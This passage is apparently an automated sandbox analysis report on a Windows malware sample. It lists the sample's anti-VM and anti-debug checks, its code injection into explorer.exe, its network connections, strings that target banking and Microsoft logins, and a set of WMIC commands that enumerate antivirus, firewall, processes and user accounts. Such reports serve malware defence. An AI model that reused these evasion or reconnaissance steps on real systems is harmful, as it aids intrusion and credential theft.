Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 859	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Window / User API: threadDelayed 2564	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 2121	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Window / User API: threadDelayed 3970	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 3963

Found evasive API chain (date check)

Source: C:\Users\user\AppData\Local\Temp\354F.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Found evasive API chain (may stop execution after checking a module file name)

Source: C:\Users\user\AppData\Roaming\fihcrfb	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Roaming\hehcrfb	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

Found large amount of non-executed APIs

Source: C:\Windows\SysWOW64\explorer.exe	API coverage: 9.8 %
Source: C:\Users\user\AppData\Roaming\hehcrfb	API coverage: 1.0 %
Source: C:\Users\user\AppData\Roaming\fihcrfb	API coverage: 1.0 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\explorer.exe TID: 7568	Thread sleep count: 450 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7576	Thread sleep count: 1872 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7576	Thread sleep time: -187200s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7572	Thread sleep count: 613 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7572	Thread sleep time: -61300s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7792	Thread sleep count: 248 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7800	Thread sleep count: 210 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7796	Thread sleep count: 246 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8012	Thread sleep count: 86 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8016	Thread sleep count: 133 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8020	Thread sleep count: 135 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7576	Thread sleep count: 1556 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7576	Thread sleep time: -155600s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 3684	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 1988	Thread sleep count: 2564 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 1988	Thread sleep time: -2564000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7080	Thread sleep count: 2121 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7080	Thread sleep time: -2121000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 6768	Thread sleep count: 3970 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 6768	Thread sleep time: -3970000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7272	Thread sleep count: 3963 > 30
Source: C:\Windows\explorer.exe TID: 7272	Thread sleep time: -3963000s >= -30000s

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\354F.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Caption, Manufacturer, PrimaryOwnerName, UserName, Workgroup FROM Win32_ComputerSystem

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\354F.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, NumberOfCores FROM Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Uses the system / local time for branch decision (may execute only at specific dates)

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00418C80 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00514d6ch], 11h and CTI: jne 00418EC1h	0_2_00418C80
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_00418C80 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00514d6ch], 11h and CTI: jne 00418EC1h	4_2_00418C80
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004189C0 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00513d6ch], 11h and CTI: jne 00418C01h	7_2_004189C0
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_004189C0 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00513d6ch], 11h and CTI: jne 00418C01h	8_2_004189C0
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 33_2_00418C80 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00514d6ch], 11h and CTI: jne 00418EC1h	33_2_00418C80
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 34_2_004189C0 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00513d6ch], 11h and CTI: jne 00418C01h	34_2_004189C0

Source: C:\Users\user\AppData\Local\Temp\354F.exe	Code function: 9_2_00007FF780B6FB34 GetEnvironmentVariableW,lstrcatW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcatW,lstrcatW,FindClose,	9_2_00007FF780B6FB34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C32B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,	11_2_00C32B15
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C31D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,	11_2_00C31D4A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C33ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,	11_2_00C33ED9
Source: C:\Windows\explorer.exe	Code function: 13_2_00D330A8 FindFirstFileW,FindNextFileW,FindClose,	13_2_00D330A8

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 11_2_00C36512 GetSystemInfo,

11_2_00C36512

Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Source: F1A1.tmp.11.dr	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: F1A1.tmp.11.dr	Binary or memory string: discord.comVMware20,11696494690f
Source: explorer.exe, 00000002.00000000.1506409569.0000000009330000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}F
Source: F1A1.tmp.11.dr	Binary or memory string: AMC password management pageVMware20,11696494690
Source: F1A1.tmp.11.dr	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: F1A1.tmp.11.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: F1A1.tmp.11.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: F1A1.tmp.11.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: F1A1.tmp.11.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: F1A1.tmp.11.dr	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: F1A1.tmp.11.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: 354F.exe, 00000009.00000002.3874615260.000001B605CAC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fo & echo 1315569602311345261315569602\r\n\r\nHost Name: user-PC\r\nOS Name: Microsoft Windows 10 Pro\r\nOS Version: 10.0.19045 N/A Build 19045\r\nOS Manufacturer: Microsoft Corporation\r\nOS Configuration: Standalone Workstation\r\nOS Build Type: Multiprocessor Free\r\nRegistered Owner: hardz\r\nRegistered Organization: \r\nProduct ID: 00330-71431-70569-AAOEM\r\nOriginal Install Date: 03/10/2023, 10:57:18\r\nSystem Boot Time: 25/09/2023, 10:34:23\r\nSystem Manufacturer: 9exC3KV3FNmpHlL\r\nSystem Model: wmU5t6Us\r\nSystem Type: x64-based PC\r\nProcessor(s): 2 Processor(s) Installed.\r\n [01]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\n [02]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\nBIOS Version: AMUTX H8F5D, 21/11/2022\r\nWindows Directory: C:\\Windows\r\nSystem Directory: C:\\Windows\\system32\r\nBoot Device: \\Device\\HarddiskVolume1\r\nSystem Locale: en-gb;English (United Kingdom)\r\nInput Locale: de-ch;German (Switzerland)\r\nTime Zone: (UTC-05:00) Eastern Time (US & Canada)\r\nTotal Physical Memory: 4'095 MB\r\nAvailable Physical Memory: 2'913 MB\r\nVirtual Memory: Max Size: 8'191 MB\r\nVirtual Memory: Available: 7'163 MB\r\nVirtual Memory: In Use: 1'028 MB\r\nPage File Location(s): C:\\pagefile.sys\r\nDomain: cKXTB\r\nLogon Server: \\\\user-PC\r\nHotfix(s): N/A\r\nNetwork Card(s): 1 NIC(s) Installed.\r\n [01]: Intel(R) 82574L Gigabit Network Connection\r\n Connection Name: Ethernet0\r\n DHCP Enabled: No\r\n IP address(es)\r\n [01]: 192.168.2.8\r\n [02]: fe80::9405:b556:3adf:1ab3\r\nHyper-V Requirements: VM Monitor Mode Extensions: No\r\n Virtualization Enabled In Firmware: No\r\n Second Level Address Translation: No\r\n Data Execution Prevention Available: Yes\r\n1315569602311345261315569602\r\n\r\nC:\\Users\\user\\AppData\\Local\\Temp> Section . . . . . . . : Answer\r\n A (Host) Record . . . : 190.249.193.233\r\n\r\n\r\n Record Name . . . . . : nwgrus.ru\r\n Record Type . . . . . : 1\r\n Time To Live . . . . : 1\r\n Data Length . . . . . : 4\r\n Section . . . . . . . : Answer\r\n A (Host) Record . . . : 189.163.45.204\r\n\r\n\r\n1250100858311345261250100858\r\n\r\nC:\\Users\\user\\AppData\\Local\\Temp>AYmrmizsszQEZUSJNBzumPLoGLVzsZFQQxVenzOODTFtCXukOkIK\SwOkIPcPPAU.exe" ,C:\Program Files (x86)\OFtAYmrmizsszQEZUSJNBzumPLoGLVzsZFQQxVen
Source: explorer.exe, 00000002.00000000.1503584934.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00=
Source: F1A1.tmp.11.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: F1A1.tmp.11.dr	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: explorer.exe, 00000002.00000000.1506409569.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2429108620.0000000000D81000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2429108620.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: F1A1.tmp.11.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: explorer.exe, 00000002.00000000.1506409569.00000000091FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: F1A1.tmp.11.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: 354F.exe, 00000009.00000002.3874615260.000001B605CAC000.00000004.00000020.00020000.00000000.sdmp, 354F.exe, 00000009.00000002.3874615260.000001B605D33000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: explorer.exe, 00000002.00000000.1506409569.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: F1A1.tmp.11.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: F1A1.tmp.11.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: F1A1.tmp.11.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: ROUTE.EXE, 00000026.00000002.3222174402.000002608D199000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: explorer.exe, 00000002.00000000.1506409569.0000000009255000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: F1A1.tmp.11.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: explorer.exe, 00000002.00000000.1506409569.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en\volume.inf_loc
Source: F1A1.tmp.11.dr	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: explorer.exe, 00000002.00000000.1503584934.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: F1A1.tmp.11.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: explorer.exe, 00000002.00000000.1506409569.0000000009255000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTcaVMWare
Source: F1A1.tmp.11.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: F1A1.tmp.11.dr	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: F1A1.tmp.11.dr	Binary or memory string: global block list test formVMware20,11696494690
Source: F1A1.tmp.11.dr	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: explorer.exe, 0000000B.00000003.2411772678.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rs - EU East & CentralVMware20,11696494690
Source: F1A1.tmp.11.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: F1A1.tmp.11.dr	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: F1A1.tmp.11.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: F1A1.tmp.11.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: F1A1.tmp.11.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: explorer.exe, 00000002.00000000.1503584934.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000002.00000000.1506409569.0000000009330000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: F1A1.tmp.11.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: explorer.exe, 00000002.00000000.1503584934.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: F1A1.tmp.11.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Users\user\AppData\Roaming\hehcrfb	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\fihcrfb	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	System information queried: CodeIntegrityInformation	Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	Process queried: DebugPort	Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 14_2_00C21B17 CloseHandle,RtlMoveMemory,LoadLibraryA,GetProcAddress,LdrProcessRelocationBlock,

14_2_00C21B17

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\AppData\Roaming\hehcrfb

Code function: 33_2_00401000 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

33_2_00401000

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\SysWOW64\explorer.exe

14_2_00C21016

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\354F.exe

Code function: 9_2_00007FF780B678EC LoadLibraryA,GetProcAddress,GetCurrentProcess,IsWow64Process,

9_2_00007FF780B678EC

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00792017 push dword ptr fs:[00000030h]	0_2_00792017
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_0216092B mov eax, dword ptr fs:[00000030h]	0_2_0216092B
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_02160D90 mov eax, dword ptr fs:[00000030h]	0_2_02160D90
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_005F092B mov eax, dword ptr fs:[00000030h]	4_2_005F092B
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_005F0D90 mov eax, dword ptr fs:[00000030h]	4_2_005F0D90
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_006410AF push dword ptr fs:[00000030h]	4_2_006410AF
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_006CFE2B push dword ptr fs:[00000030h]	7_2_006CFE2B
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_0216092B mov eax, dword ptr fs:[00000030h]	7_2_0216092B
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_02160D90 mov eax, dword ptr fs:[00000030h]	7_2_02160D90
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_006C092B mov eax, dword ptr fs:[00000030h]	8_2_006C092B
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_006C0D90 mov eax, dword ptr fs:[00000030h]	8_2_006C0D90
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_00710113 push dword ptr fs:[00000030h]	8_2_00710113

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Local\Temp\354F.exe

Code function: 9_2_00007FF780B62654 GetProcessHeap,RtlReAllocateHeap,

9_2_00007FF780B62654

Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 33_2_00401000 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	33_2_00401000
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 33_2_00403EE2 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	33_2_00403EE2
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 33_2_00408D0A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	33_2_00408D0A
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 33_2_004047EE SetUnhandledExceptionFilter,	33_2_004047EE
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 34_2_00401000 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	34_2_00401000
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 34_2_00403EE2 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	34_2_00403EE2
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 34_2_00408D0A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	34_2_00408D0A
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 34_2_004047EE SetUnhandledExceptionFilter,	34_2_004047EE

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: 354F.exe.2.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 109.121.204.14 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 187.228.112.175 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.145.40.164 443	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Network Connect: 23.145.40.162 443	Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Thread created: C:\Windows\explorer.exe EIP: A6F19A8	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	Thread created: unknown EIP: 7FC19A8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Thread created: unknown EIP: 2CE1970	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	Thread created: unknown EIP: 87F1970	Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\explorer.exe	Memory written: PID: 1012 base: F479C0 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 5268 base: 7FF62D872D10 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 1996 base: F479C0 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 7144 base: 7FF62D872D10 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 6784 base: F479C0 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 7252 base: 7FF62D872D10 value: 90	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: F479C0	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: F479C0	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: F479C0	Jump to behavior

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Source: C:\Windows\SysWOW64\explorer.exe	Code function: wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe		16_2_00AD10A5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe		16_2_00AD1016

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\AppData\Local\Temp\354F.exe	Process created: C:\Windows\System32\cmd.exe cmd	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
